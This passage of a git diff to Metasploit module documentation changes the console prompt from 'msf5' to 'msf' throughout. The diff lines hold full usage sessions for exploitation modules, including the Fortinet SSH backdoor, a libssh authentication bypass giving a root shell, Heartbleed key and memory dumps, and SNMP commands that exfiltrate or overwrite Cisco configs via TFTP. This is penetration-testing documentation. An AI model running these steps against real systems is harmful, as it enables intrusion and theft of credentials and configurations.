true - msf5 auxiliary(scanner/rsync/modules_list) > run + msf auxiliary(scanner/rsync/modules_list) > run [+] 10.168.202.216:873 - 3 rsync modules found: read only files, writable, authenticated diff --git a/documentation/modules/auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles.md b/documentation/modules/auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles.md index 899cfb4000..e94664a45a 100644 --- a/documentation/modules/auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles.md +++ b/documentation/modules/auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles.md @@ -37,8 +37,8 @@ With this module you can list the config files that SAP loads when starts the SA ``` -msf5 > use auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles -msf5 auxiliary(scanner/sap/sap_mgmt_con_listconfigfiles) > show options +msf > use auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles +msf auxiliary(scanner/sap/sap_mgmt_con_listconfigfiles) > show options Module options (auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles): @@ -52,9 +52,9 @@ Module options (auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles): URI / no Path to the SAP Management Console VHOST no HTTP server virtual host - msf5 auxiliary(scanner/sap/sap_mgmt_con_listconfigfiles) > set RHOSTS 192.168.10.45 + msf auxiliary(scanner/sap/sap_mgmt_con_listconfigfiles) > set RHOSTS 192.168.10.45 RHOSTS => 192.168.10.45 - msf5 auxiliary(scanner/sap/sap_mgmt_con_listconfigfiles) > run + msf auxiliary(scanner/sap/sap_mgmt_con_listconfigfiles) > run [...] ``` diff --git a/documentation/modules/auxiliary/scanner/scada/modbus_banner_grabbing.md b/documentation/modules/auxiliary/scanner/scada/modbus_banner_grabbing.md index 7bf2976e78..c555c1ce5f 100644 --- a/documentation/modules/auxiliary/scanner/scada/modbus_banner_grabbing.md +++ b/documentation/modules/auxiliary/scanner/scada/modbus_banner_grabbing.md @@ -21,7 +21,7 @@ If the target was unable to process the Modbus message, a Modbus exception messa Successful results from the scan will be stored as a `note` in the framework. You can access these notes by typing `note` in the console. ``` -msf5 auxiliary(scanner/scada/modbus_banner_grabbing) > notes +msf auxiliary(scanner/scada/modbus_banner_grabbing) > notes Notes ===== diff --git a/documentation/modules/auxiliary/scanner/sip/options_tcp.md b/documentation/modules/auxiliary/scanner/sip/options_tcp.md index 4b846871c9..d0f2632815 100644 --- a/documentation/modules/auxiliary/scanner/sip/options_tcp.md +++ b/documentation/modules/auxiliary/scanner/sip/options_tcp.md @@ -18,10 +18,10 @@ ``` -msf5 > use auxiliary/scanner/sip/options_tcp -msf5 auxiliary(scanner/sip/options_tcp) > set rhosts 2.2.2.2 +msf > use auxiliary/scanner/sip/options_tcp +msf auxiliary(scanner/sip/options_tcp) > set rhosts 2.2.2.2 rhosts => 2.2.2.2 -msf5 auxiliary(scanner/sip/options_tcp) > run +msf auxiliary(scanner/sip/options_tcp) > run [*] 2.2.2.2:5060 - 2.2.2.2:5060 tcp SIP/2.0 200 OK: {"Server"=>"Cisco-SIPGateway/IOS-12.x", "Allow"=>"INVITE, OPTIONS, BYE, CANCEL, ACK, PRACK, UPDATE, REFER, SUBSCRIBE, NOTIFY, INFO, REGISTER"} [*] 2.2.2.2:5060 - Scanned 1 of 1 hosts (100% complete) diff --git a/documentation/modules/auxiliary/scanner/smb/smb_version.md b/documentation/modules/auxiliary/scanner/smb/smb_version.md index afda7d8c83..4e181df7a6 100644 --- a/documentation/modules/auxiliary/scanner/smb/smb_version.md +++ b/documentation/modules/auxiliary/scanner/smb/smb_version.md @@ -39,9 +39,9 @@ identify the information about the host operating system. This is an example run of a network with several different version of Windows, metasploit 1 and 2, and a NAS device running SAMBA. ``` -msf5 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.159.0/24 +msf auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.159.0/24 RHOSTS => 192.168.159.0/24 -msf5 auxiliary(scanner/smb/smb_version) > show options +msf auxiliary(scanner/smb/smb_version) > show options Module options (auxiliary/scanner/smb/smb_version): @@ -50,7 +50,7 @@ Module options (auxiliary/scanner/smb/smb_version): RHOSTS 192.168.159.0/24 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' THREADS 15 yes The number of concurrent threads (max one per host) -msf5 auxiliary(scanner/smb/smb_version) > run +msf auxiliary(scanner/smb/smb_version) > run [*] 192.168.159.10:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:required) (guid:{faf5534c-d125-4081-aa2a-cf3256415908}) (authentication domain:MSFLAB) [*] 192.168.159.10:445 - Host could not be identified: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3) @@ -74,5 +74,5 @@ msf5 auxiliary(scanner/smb/smb_version) > run [*] 192.168.159.0/24: - Scanned 234 of 256 hosts (91% complete) [*] 192.168.159.0/24: - Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/smb/smb_version) > +msf auxiliary(scanner/smb/smb_version) > ``` diff --git a/documentation/modules/auxiliary/scanner/smtp/smtp_version.md b/documentation/modules/auxiliary/scanner/smtp/smtp_version.md index f20d26d2e8..b1b1685df1 100644 --- a/documentation/modules/auxiliary/scanner/smtp/smtp_version.md +++ b/documentation/modules/auxiliary/scanner/smtp/smtp_version.md @@ -26,10 +26,10 @@ In this case, we don't need to configure all the users and set up the server ful ### Postfix 3.3.0-1+b1 (Ubuntu package number) on Kali (using above config) ``` - msf5 > use auxiliary/scanner/smtp/smtp_version - msf5 auxiliary(scanner/smtp/smtp_version) > set rhosts 10.168.202.216 + msf > use auxiliary/scanner/smtp/smtp_version + msf auxiliary(scanner/smtp/smtp_version) > set rhosts 10.168.202.216 rhosts => 10.168.202.216 - msf5 auxiliary(scanner/smtp/smtp_version) > run + msf auxiliary(scanner/smtp/smtp_version) > run [+] 10.168.202.216:25 - 10.168.202.216:25 SMTP 220 rageKali.ragegroup ESMTP Postfix (Debian/GNU)\x0d\x0a ``` diff --git a/documentation/modules/auxiliary/scanner/snmp/cisco_config_tftp.md b/documentation/modules/auxiliary/scanner/snmp/cisco_config_tftp.md index 2204fe0a2c..9c55421225 100644 --- a/documentation/modules/auxiliary/scanner/snmp/cisco_config_tftp.md +++ b/documentation/modules/auxiliary/scanner/snmp/cisco_config_tftp.md @@ -26,12 +26,12 @@ ### Cisco UC520-8U-4FXO-K9 running IOS 12.4 ``` -msf5 > setg rhosts 2.2.2.2 +msf > setg rhosts 2.2.2.2 rhosts => 2.2.2.2 -msf5 > use auxiliary/scanner/snmp/cisco_config_tftp -msf5 auxiliary(scanner/snmp/cisco_config_tftp) > set community private +msf > use auxiliary/scanner/snmp/cisco_config_tftp +msf auxiliary(scanner/snmp/cisco_config_tftp) > set community private community => private -msf5 auxiliary(scanner/snmp/cisco_config_tftp) > run +msf auxiliary(scanner/snmp/cisco_config_tftp) > run [*] Starting TFTP server... [*] Scanning for vulnerable targets... @@ -55,10 +55,10 @@ was utilized to create this process. 1. Start the TFTP server ``` -msf5 > use auxiliary/server/tftp -msf5 auxiliary(server/tftp) > run +msf > use auxiliary/server/tftp +msf auxiliary(server/tftp) > run [*] Auxiliary module running as background job 0. -msf5 auxiliary(server/tftp) > +msf auxiliary(server/tftp) > [*] Starting TFTP server on 0.0.0.0:69... [*] Files will be served from /tmp [*] Uploaded files will be saved in /tmp @@ -67,27 +67,27 @@ msf5 auxiliary(server/tftp) > 2. Execute the SNMP commands. An integer is required to group the requests together, `666` is used in this example. ``` -msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 i 1 +msf auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 i 1 [*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 i 1 iso.3.6.1.4.1.9.9.96.1.1.1.1.2.666 = INTEGER: 1 -msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.3.666 i 4 +msf auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.3.666 i 4 [*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.3.666 i 4 iso.3.6.1.4.1.9.9.96.1.1.1.1.3.666 = INTEGER: 4 -msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.4.666 i 1 +msf auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.4.666 i 1 [*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.4.666 i 1 iso.3.6.1.4.1.9.9.96.1.1.1.1.4.666 = INTEGER: 1 -msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.5.666 a "1.1.1.1" +msf auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.5.666 a "1.1.1.1" [*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.5.666 a "1.1.1.1" iso.3.6.1.4.1.9.9.96.1.1.1.1.5.666 = IpAddress: 1.1.1.1 -msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.6.666 s "backup_config" +msf auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.6.666 s "backup_config" [*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.6.666 s "backup_config" iso.3.6.1.4.1.9.9.96.1.1.1.1.6.666 = STRING: "backup_config" -msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 i 1 +msf auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 i 1 [*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 i 1 iso.3.6.1.4.1.9.9.96.1.1.1.1.14.666 = INTEGER: 1 @@ -96,7 +96,7 @@ iso.3.6.1.4.1.9.9.96.1.1.1.1.14.666 = INTEGER: 1 3. At this point the config is transferring, we need to wait a few seconds. Lastly, we'll remove `666` from the system. ``` -msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 i 6 +msf auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 i 6 [*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 i 6 iso.3.6.1.4.1.9.9.96.1.1.1.1.14.666 = INTEGER: 6 @@ -105,7 +105,7 @@ iso.3.6.1.4.1.9.9.96.1.1.1.1.14.666 = INTEGER: 6 4. Confirm we have our config file ``` -msf5 auxiliary(server/tftp) > ls -lah /tmp/backup_config +msf auxiliary(server/tftp) > ls -lah /tmp/backup_config [*] exec: ls -lah /tmp/backup_config -rw-r--r-- 1 root root 23K Oct 11 22:20 /tmp/backup_config diff --git a/documentation/modules/auxiliary/scanner/snmp/cisco_upload_file.md b/documentation/modules/auxiliary/scanner/snmp/cisco_upload_file.md index 48b294bce4..6f50bdd08c 100644 --- a/documentation/modules/auxiliary/scanner/snmp/cisco_upload_file.md +++ b/documentation/modules/auxiliary/scanner/snmp/cisco_upload_file.md @@ -49,14 +49,14 @@ Override_Config ### Cisco UC520-8U-4FXO-K9 running IOS 12.4 ``` -msf5 > setg rhosts 2.2.2.2 +msf > setg rhosts 2.2.2.2 rhosts => 2.2.2.2 -msf5 > use auxiliary/scanner/snmp/cisco_upload_file -msf5 auxiliary(scanner/snmp/cisco_upload_file) > set source /tmp/backup_config2 +msf > use auxiliary/scanner/snmp/cisco_upload_file +msf auxiliary(scanner/snmp/cisco_upload_file) > set source /tmp/backup_config2 source => /tmp/backup_config2 -msf5 auxiliary(scanner/snmp/cisco_upload_file) > set community private +msf auxiliary(scanner/snmp/cisco_upload_file) > set community private community => private -msf5 auxiliary(scanner/snmp/cisco_upload_file) > run +msf auxiliary(scanner/snmp/cisco_upload_file) > run [*] Starting TFTP server... [*] Copying file backup_config2 to 2.2.2.2... @@ -69,17 +69,17 @@ msf5 auxiliary(scanner/snmp/cisco_upload_file) > run ``` -`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set COMMUNITY private` +`msf auxiliary(scanner/snmp/cisco_upload_file) > set COMMUNITY private` `COMMUNITY => private` -`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set LHOST 10.20.164.164` +`msf auxiliary(scanner/snmp/cisco_upload_file) > set LHOST 10.20.164.164` `LHOST => 10.20.164.164` -`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set action Override_Config` +`msf auxiliary(scanner/snmp/cisco_upload_file) > set action Override_Config` `action => Override_Config` -`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set rhosts 10.20.205.5` +`msf auxiliary(scanner/snmp/cisco_upload_file) > set rhosts 10.20.205.5` `rhosts => 10.20.205.5` -`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set source /root/Desktop/newconfig` +`msf auxiliary(scanner/snmp/cisco_upload_file) > set source /root/Desktop/newconfig` `source => /root/Desktop/newconfig` -`msf5 auxiliary(scanner/snmp/cisco_upload_file) > run` +`msf auxiliary(scanner/snmp/cisco_upload_file) > run` `[*] Starting TFTP server...` `[*] Copying file newconfig to 10.20.205.5...` diff --git a/documentation/modules/auxiliary/scanner/ssh/fortinet_backdoor.md b/documentation/modules/auxiliary/scanner/ssh/fortinet_backdoor.md index dc5725a87f..dc3ee7bb22 100644 --- a/documentation/modules/auxiliary/scanner/ssh/fortinet_backdoor.md +++ b/documentation/modules/auxiliary/scanner/ssh/fortinet_backdoor.md @@ -11,12 +11,12 @@ This module scans for the Fortinet SSH backdoor and creates sessions. ## Usage ``` -msf5 > use auxiliary/scanner/ssh/fortinet_backdoor -msf5 auxiliary(scanner/ssh/fortinet_backdoor) > set rhosts 192.168.212.0/24 +msf > use auxiliary/scanner/ssh/fortinet_backdoor +msf auxiliary(scanner/ssh/fortinet_backdoor) > set rhosts 192.168.212.0/24 rhosts => 192.168.212.0/24 -msf5 auxiliary(scanner/ssh/fortinet_backdoor) > set threads 100 +msf auxiliary(scanner/ssh/fortinet_backdoor) > set threads 100 threads => 100 -msf5 auxiliary(scanner/ssh/fortinet_backdoor) > run +msf auxiliary(scanner/ssh/fortinet_backdoor) > run [*] Scanned 54 of 256 hosts (21% complete) [+] 192.168.212.128:22 - Logged in as Fortimanager_Access @@ -31,7 +31,7 @@ msf5 auxiliary(scanner/ssh/fortinet_backdoor) > run [*] Scanned 240 of 256 hosts (93% complete) [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/ssh/fortinet_backdoor) > sessions -1 +msf auxiliary(scanner/ssh/fortinet_backdoor) > sessions -1 [*] Starting interaction with 1... FortiGate-VM # get system status diff --git a/documentation/modules/auxiliary/scanner/ssh/libssh_auth_bypass.md b/documentation/modules/auxiliary/scanner/ssh/libssh_auth_bypass.md index d1d46913f8..159b5e110c 100644 --- a/documentation/modules/auxiliary/scanner/ssh/libssh_auth_bypass.md +++ b/documentation/modules/auxiliary/scanner/ssh/libssh_auth_bypass.md @@ -134,23 +134,23 @@ OOB authentication packet always returns `true`. Positive testing against unpatched libssh 0.8.3: ``` -msf5 > use auxiliary/scanner/ssh/libssh_auth_bypass -msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set rhosts 172.28.128.3 +msf > use auxiliary/scanner/ssh/libssh_auth_bypass +msf auxiliary(scanner/ssh/libssh_auth_bypass) > set rhosts 172.28.128.3 rhosts => 172.28.128.3 -msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set rport 2222 +msf auxiliary(scanner/ssh/libssh_auth_bypass) > set rport 2222 rport => 2222 -msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set spawn_pty true +msf auxiliary(scanner/ssh/libssh_auth_bypass) > set spawn_pty true spawn_pty => true -msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set verbose true +msf auxiliary(scanner/ssh/libssh_auth_bypass) > set verbose true verbose => true -msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run +msf auxiliary(scanner/ssh/libssh_auth_bypass) > run [*] 172.28.128.3:2222 - Attempting authentication bypass [+] 172.28.128.3:2222 - SSH-2.0-libssh_0.8.3 appears to be unpatched [*] Command shell session 1 opened (172.28.128.1:56981 -> 172.28.128.3:2222) at 2018-10-19 12:38:24 -0500 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > sessions -1 +msf auxiliary(scanner/ssh/libssh_auth_bypass) > sessions -1 [*] Starting interaction with 1... # id @@ -168,11 +168,11 @@ tty Positive testing of shell commands using the `Execute` action: ``` -msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set action Execute +msf auxiliary(scanner/ssh/libssh_auth_bypass) > set action Execute action => Execute -msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set cmd id; uname -a +msf auxiliary(scanner/ssh/libssh_auth_bypass) > set cmd id; uname -a cmd => id; uname -a -msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run +msf auxiliary(scanner/ssh/libssh_auth_bypass) > run [*] 172.28.128.3:2222 - Attempting authentication bypass [+] 172.28.128.3:2222 - SSH-2.0-libssh_0.8.3 appears to be unpatched @@ -181,53 +181,53 @@ uid=0(root) gid=0(root) groups=0(root) Linux ubuntu-xenial 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > +msf auxiliary(scanner/ssh/libssh_auth_bypass) > ``` Negative testing against patched libssh 0.8.4: ``` -msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run +msf auxiliary(scanner/ssh/libssh_auth_bypass) > run [*] 172.28.128.3:2222 - Attempting authentication bypass [-] 172.28.128.3:2222 - SSH-2.0-libssh_0.8.4 appears to be patched [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > +msf auxiliary(scanner/ssh/libssh_auth_bypass) > ``` Negative testing against an insufficiently implemented libssh server: ``` -msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run +msf auxiliary(scanner/ssh/libssh_auth_bypass) > run [*] 172.28.128.3:2222 - Attempting authentication bypass [+] 172.28.128.3:2222 - SSH-2.0-libssh_0.8.3 appears to be unpatched [-] 172.28.128.3:2222 - Net::SSH::ChannelOpenFailed: Session channel open failed (1) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run +msf auxiliary(scanner/ssh/libssh_auth_bypass) > run [*] 172.28.128.3:2222 - Attempting authentication bypass [+] 172.28.128.3:2222 - SSH-2.0-libssh_0.8.3 appears to be unpatched [-] 172.28.128.3:2222 - Net::SSH::ChannelRequestFailed: Shell/exec channel request failed [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > +msf auxiliary(scanner/ssh/libssh_auth_bypass) > ``` Negative testing against OpenSSH: ``` -msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set rport 22 +msf auxiliary(scanner/ssh/libssh_auth_bypass) > set rport 22 rport => 22 -msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run +msf auxiliary(scanner/ssh/libssh_auth_bypass) > run [*] 172.28.128.3:22 - Attempting authentication bypass [-] 172.28.128.3:22 - SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4 does not appear to be libssh [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > +msf auxiliary(scanner/ssh/libssh_auth_bypass) > ``` Confirming auth is still normally present using the OpenSSH client: diff --git a/documentation/modules/auxiliary/scanner/ssh/ssh_enum_git_keys.md b/documentation/modules/auxiliary/scanner/ssh/ssh_enum_git_keys.md index 0306cd0f77..d0cb6a3b18 100644 --- a/documentation/modules/auxiliary/scanner/ssh/ssh_enum_git_keys.md +++ b/documentation/modules/auxiliary/scanner/ssh/ssh_enum_git_keys.md @@ -14,10 +14,10 @@ This module attempts to authenticate to Git servers using compromised SSH privat ## Usage ``` -msf5 > use auxiliary/scanner/ssh/ssh_enum_git_keys -msf5 auxiliary(scanner/ssh/ssh_enum_git_keys) > set KEY_DIR /Users/w/.ssh +msf > use auxiliary/scanner/ssh/ssh_enum_git_keys +msf auxiliary(scanner/ssh/ssh_enum_git_keys) > set KEY_DIR /Users/w/.ssh KEY_DIR => /Users/w/.ssh -msf5 auxiliary(scanner/ssh/ssh_enum_git_keys) > run +msf auxiliary(scanner/ssh/ssh_enum_git_keys) > run Git Access Data =============== diff --git a/documentation/modules/auxiliary/scanner/ssh/ssh_enumusers.md b/documentation/modules/auxiliary/scanner/ssh/ssh_enumusers.md index 772ce12914..cea7fefe36 100644 --- a/documentation/modules/auxiliary/scanner/ssh/ssh_enumusers.md +++ b/documentation/modules/auxiliary/scanner/ssh/ssh_enumusers.md @@ -39,17 +39,17 @@ Check for false positives (random username). ## Usage ``` -msf5 > use auxiliary/scanner/ssh/ssh_enumusers -msf5 auxiliary(scanner/ssh/ssh_enumusers) > set rhosts [redacted] +msf > use auxiliary/scanner/ssh/ssh_enumusers +msf auxiliary(scanner/ssh/ssh_enumusers) > set rhosts [redacted] rhosts => [redacted] -msf5 auxiliary(scanner/ssh/ssh_enumusers) > echo $'wvu\nbcook' > users +msf auxiliary(scanner/ssh/ssh_enumusers) > echo $'wvu\nbcook' > users [*] exec: echo $'wvu\nbcook' > users -msf5 auxiliary(scanner/ssh/ssh_enumusers) > set user_file users +msf auxiliary(scanner/ssh/ssh_enumusers) > set user_file users user_file => users -msf5 auxiliary(scanner/ssh/ssh_enumusers) > set verbose true +msf auxiliary(scanner/ssh/ssh_enumusers) > set verbose true verbose => true -msf5 auxiliary(scanner/ssh/ssh_enumusers) > run +msf auxiliary(scanner/ssh/ssh_enumusers) > run [*] [redacted]:22 - SSH - Using malformed packet technique [*] [redacted]:22 - SSH - Starting scan @@ -57,9 +57,9 @@ msf5 auxiliary(scanner/ssh/ssh_enumusers) > run [-] [redacted]:22 - SSH - User 'bcook' not found [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/ssh/ssh_enumusers) > set action Timing Attack +msf auxiliary(scanner/ssh/ssh_enumusers) > set action Timing Attack action => Timing Attack -msf5 auxiliary(scanner/ssh/ssh_enumusers) > run +msf auxiliary(scanner/ssh/ssh_enumusers) > run [*] [redacted]:22 - SSH - Using timing attack technique [*] [redacted]:22 - SSH - Starting scan @@ -67,7 +67,7 @@ msf5 auxiliary(scanner/ssh/ssh_enumusers) > run [-] [redacted]:22 - SSH - User 'bcook' not found [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/ssh/ssh_enumusers) > creds +msf auxiliary(scanner/ssh/ssh_enumusers) > creds Credentials =========== @@ -75,5 +75,5 @@ host origin service public private realm private_type ---- ------ ------- ------ ------- ----- ------------ [redacted] [redacted] 22/tcp (ssh) wvu -msf5 auxiliary(scanner/ssh/ssh_enumusers) > +msf auxiliary(scanner/ssh/ssh_enumusers) > ``` diff --git a/documentation/modules/auxiliary/scanner/ssh/ssh_version.md b/documentation/modules/auxiliary/scanner/ssh/ssh_version.md index 80328cacc9..846ddb1451 100644 --- a/documentation/modules/auxiliary/scanner/ssh/ssh_version.md +++ b/documentation/modules/auxiliary/scanner/ssh/ssh_version.md @@ -44,10 +44,10 @@ Check for cryptographic issues. Defaults to `true` ### SSH-2.0 on GitHub ``` -msf5 > use auxiliary/scanner/ssh/ssh_version -msf5 auxiliary(scanner/ssh/ssh_version) > set RHOSTS github.com +msf > use auxiliary/scanner/ssh/ssh_version +msf auxiliary(scanner/ssh/ssh_version) > set RHOSTS github.com RHOSTS => github.com -msf5 auxiliary(scanner/ssh/ssh_version) > run +msf auxiliary(scanner/ssh/ssh_version) > run [*] 140.82.113.4 - Key Fingerprint: ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOMqqnkVzrm0SdG6UOoqKLsabgH5C9okWi0dh2l9GKJl [*] 140.82.113.4 - SSH server version: SSH-2.0-babeld-8405f9f3 @@ -89,7 +89,7 @@ msf5 auxiliary(scanner/ssh/ssh_version) > run ### Docker image ``` -msf5 > use auxiliary/scanner/ssh/ssh_version +msf > use auxiliary/scanner/ssh/ssh_version msf auxiliary(scanner/ssh/ssh_version) > set rhosts 172.17.0.2 rhosts => 172.17.0.2 msf auxiliary(scanner/ssh/ssh_version) > set verbose true diff --git a/documentation/modules/auxiliary/scanner/ssl/openssl_heartbleed.md b/documentation/modules/auxiliary/scanner/ssl/openssl_heartbleed.md index 280db80f7a..4c28e43cb0 100644 --- a/documentation/modules/auxiliary/scanner/ssl/openssl_heartbleed.md +++ b/documentation/modules/auxiliary/scanner/ssl/openssl_heartbleed.md @@ -118,12 +118,12 @@ $ curl https://localhost:8443 -k With the default action of `SCAN` we can determine if the server is vulnerable or not. ``` -msf5 > use auxiliary/scanner/ssl/openssl_heartbleed -msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 222.222.2.222 +msf > use auxiliary/scanner/ssl/openssl_heartbleed +msf auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 222.222.2.222 rhosts => 222.222.2.222 -msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rport 44330 +msf auxiliary(scanner/ssl/openssl_heartbleed) > set rport 44330 rport => 44330 -msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run +msf auxiliary(scanner/ssl/openssl_heartbleed) > run [+] 222.222.2.222:44330 - Heartbeat response with leak, 65535 bytes [*] 222.222.2.222:44330 - Scanned 1 of 1 hosts (100% complete) @@ -140,9 +140,9 @@ watch 'cat openssl-1.0.1d/key.pem; cat openssl-1.0.1d/cert.pem' ``` ``` -msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set action KEYS +msf auxiliary(scanner/ssl/openssl_heartbleed) > set action KEYS action => KEYS -msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run +msf auxiliary(scanner/ssl/openssl_heartbleed) > run [*] 222.222.2.222:44330 - Scanning for private keys [*] 222.222.2.222:44330 - Getting public key constants... @@ -185,15 +185,15 @@ FbawD4i1LZxrihOuuy3nt34hIlprjtW2WV49NiWnbwEzZo6ejm5NRg== ### DUMP against s_server on Ubuntu 18.04 with OpenSSL 1.0.1d ``` -msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set action DUMP +msf auxiliary(scanner/ssl/openssl_heartbleed) > set action DUMP action => DUMP -msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run +msf auxiliary(scanner/ssl/openssl_heartbleed) > run [+] 222.222.2.222:44330 - Heartbeat response with leak, 65535 bytes [+] 222.222.2.222:44330 - Heartbeat data stored in /root/.msf4/loot/20191012213447_default_222.222.2.222_openssl.heartble_500776.bin [*] 222.222.2.222:44330 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/ssl/openssl_heartbleed) > cat /root/.msf4/loot/20191012213447_default_222.222.2.222_openssl.heartble_500776.bin +msf auxiliary(scanner/ssl/openssl_heartbleed) > cat /root/.msf4/loot/20191012213447_default_222.222.2.222_openssl.heartble_500776.bin [*] exec: cat /root/.msf4/loot/20191012213447_default_222.222.2.222_openssl.heartble_500776.bin ���]�O���g�hE�_.[�MT��b��΋k�f�� @@ -354,12 +354,12 @@ Because arbitrary memory is dumped, a high volume application that uses openSSL fairly often. The `repeat` command can be used to execute the module multiple times. ``` -msf5 > use auxiliary/scanner/ssl/openssl_heartbleed -msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 222.222.2.222 +msf > use auxiliary/scanner/ssl/openssl_heartbleed +msf auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 222.222.2.222 rhosts => 222.222.2.222 -msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set action DUMP +msf auxiliary(scanner/ssl/openssl_heartbleed) > set action DUMP action => DUMP -msf5 auxiliary(scanner/ssl/openssl_heartbleed) > repeat -n 10 run +msf auxiliary(scanner/ssl/openssl_heartbleed) > repeat -n 10 run [*] 222.222.2.222:443 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed diff --git a/documentation/modules/auxiliary/scanner/tftp/tftpbrute.md b/documentation/modules/auxiliary/scanner/tftp/tftpbrute.md index 65b336650d..ec83febfbe 100644 --- a/documentation/modules/auxiliary/scanner/tftp/tftpbrute.md +++ b/documentation/modules/auxiliary/scanner/tftp/tftpbrute.md @@ -41,15 +41,15 @@ echo "hello world" > /srv/tftp/test.txt Now we can find the file: ``` -msf5 > use 